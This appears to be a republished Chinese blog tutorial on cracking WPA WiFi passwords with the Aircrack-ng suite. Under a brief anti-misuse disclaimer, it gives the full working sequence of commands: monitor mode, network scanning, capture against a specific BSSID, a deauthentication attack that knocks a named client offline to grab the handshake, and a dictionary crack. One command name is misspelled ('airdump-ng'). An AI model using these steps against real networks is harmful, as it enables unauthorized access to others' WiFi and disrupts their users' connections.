近源渗透 | 使用Aircrack-ng破解wifi密码

admin 2022年10月29日16:27:25评论154 views字数 740阅读2分28秒阅读模式

声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。



本次实验是在vmware虚拟机中的kali系统下进行的,kali虚拟机中需要使用USB无线网卡RT3070,大家如果需要,可以点击下方链接进行购买。

近源渗透 | 使用Aircrack-ng破解wifi密码

设置wlan为监听模式


airmon-ng start wlan0   #开启网卡wlan0监听模式iwconfig                #查看网卡状态,发现wlan0mon,表示已开启成功

近源渗透 | 使用Aircrack-ng破解wifi密码

近源渗透 | 使用Aircrack-ng破解wifi密码

探测附近WiFi


airdump-ng wlan0mon
  • BSSID 代表路由器的MAC地址;

  • PWR 代表信号的强度,数值越大代表信息越强;

  • CH 代表信道;

  • ENC代表用的加密的方式;

  • AUTH 代表认证的方式;

  • ESSID是WIFI的名字;

近源渗透 | 使用Aircrack-ng破解wifi密码

近源渗透 | 使用Aircrack-ng破解wifi密码

监听路由


sudo airodump-ng -c 8 -w  /home/wifi  --bssid F0:16:28:21:FB:EA  wlan0mon
  • -c 信道数

  • -w cap存储路径

  • -bssid AP mac地址

近源渗透 | 使用Aircrack-ng破解wifi密码

近源渗透 | 使用Aircrack-ng破解wifi密码

对目标用户发起攻击使其掉线


对目标用户发起攻击使其掉线,wifi重连,获取一次握手数据包

aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon
  • -0 5 攻击模式 攻击次数

  • -a AP mac地址

  • -c 用户的 mac地址

近源渗透 | 使用Aircrack-ng破解wifi密码

近源渗透 | 使用Aircrack-ng破解wifi密码

数据包重放破解wifi密码


aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA  /home/wifi-01.cap
  • -w 密码字典路径

  • -b AP mac地址

  • 上一步流量包路径

近源渗透 | 使用Aircrack-ng破解wifi密码

更多学习材料,请关注知识星球!

近源渗透 | 使用Aircrack-ng破解wifi密码

原文始发于微信公众号(betasec):近源渗透 | 使用Aircrack-ng破解wifi密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日16:27:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   近源渗透 | 使用Aircrack-ng破解wifi密码http://cn-sec.com/archives/1366199.html

发表评论

匿名网友 填写信息